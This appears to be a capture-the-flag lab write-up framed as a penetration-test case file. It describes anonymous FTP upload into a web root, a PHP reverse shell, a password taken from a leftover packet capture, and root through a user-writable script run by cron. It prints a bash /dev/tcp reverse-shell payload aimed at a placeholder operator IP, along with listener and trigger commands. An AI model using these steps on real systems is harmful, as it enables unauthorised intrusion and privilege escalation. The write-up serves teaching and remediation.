Case file

FTP webroot write, PCAP credential recovery, and cron script abuse

Anonymous FTP mapped into Apache /files/ftp/, enabling a PHP reverse shell as www-data. An incident PCAP leaked lennie’s password. Root cron invoked a user-writable /etc/print.sh we replaced with a reverse shell.

Foundations32 minLinux · FTP · Web · Privilege Escalation
01

Engagement summary

Writable anonymous FTP under the web document root gave www-data. Historical packet capture disclosed a user password. A root cron job executed a script owned by that user — a direct path to root.

Host startup exposed vsftpd with a world-writable ftp/ directory that mirrored into http://target/files/ftp/. Uploading a PHP reverse shell produced a www-data session. Under /incidents we found suspicious.pcapng; following the TCP stream recovered password c4ntg3t3n0ughsp1c3 for user lennie. lennie could write /etc/print.sh, which planner.sh (root cron) executed every minute.

Business impact

FTP-to-webroot write is remote code execution. Leaving incident PCAPs on the host re-exposed credentials. Cron that trusts user-writable scripts is an intentional privilege boundary failure.

02

Service discovery and FTP/web overlap

nmap showed FTP (anonymous writeable), SSH, and Apache maintenance page. dirsearch found /files/ mirroring FTP.

OPERATOR · NMAP

savvy@lab:~$ nmap -sV 10.10.231.18

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 3.0.3

| ftp-anon: Anonymous FTP login allowed — ftp/ directory writeable

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

|_http-title: Maintenance

OPERATOR · DIRSEARCH

savvy@lab:~$ dirsearch -u 10.10.231.18

[21:10:20] 301 - /files -> http://10.10.231.18/files/

[21:10:20] 200 - /files/

03

Initial access — PHP shell via FTP

Uploaded shell.php into ftp/, triggered via HTTP, caught www-data on 1234.

OPERATOR · FTP UPLOAD

savvy@lab:~$ ftp 10.10.231.18

ftp> put shell.php ftp/shell.php

Listener and HTTP trigger

OPERATOR · CALLBACK

savvy@lab:~$ nc -lnvp 1234

savvy@lab:~$ curl http://10.10.231.18/files/ftp/shell.php

Connection received on 10.10.231.18 52636

uid=33(www-data) gid=33(www-data) groups=33(www-data)

PAYLOAD

print.sh (later stage)

#!/bin/bash
bash -i >& /dev/tcp/OPERATOR_IP/1234 0>&1
04

Credential recovery from incident PCAP

suspicious.pcapng under /incidents contained a prior attacker session; TCP stream showed lennie’s password.

We served /incidents over python3 -m http.server, pulled suspicious.pcapng, and followed the TCP stream in Wireshark. The capture included a sudo password prompt and a passwd entry for lennie.

OPERATOR · SU LENNIE

savvy@lab:/$ su lennie

Password: c4ntg3t3n0ughsp1c3

savvy@lab:~$

Finding

Incident response artifacts left on the host reintroduced the same credentials the incident was meant to contain.

05

Root via cron-invoked writable print.sh

planner.sh (root) called /etc/print.sh owned by lennie. We replaced print.sh with a reverse shell and waited for the minute cron.

SCRIPT

planner.sh

#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

OPERATOR · CRON ABUSE

savvy@lab:~$ ls -la /etc/print.sh

-rwx------ 1 lennie lennie 25 … /etc/print.sh

# overwrite print.sh with reverse shell; await cron

savvy@lab:~$ nc -lnvp 1234

uid=0(root) gid=0(root) groups=0(root)

Remediation

Unmap FTP from the webroot, disable anonymous write, scrub incident PCAPs from production hosts, and ensure cron scripts are root-owned 0755/0644 with no user write.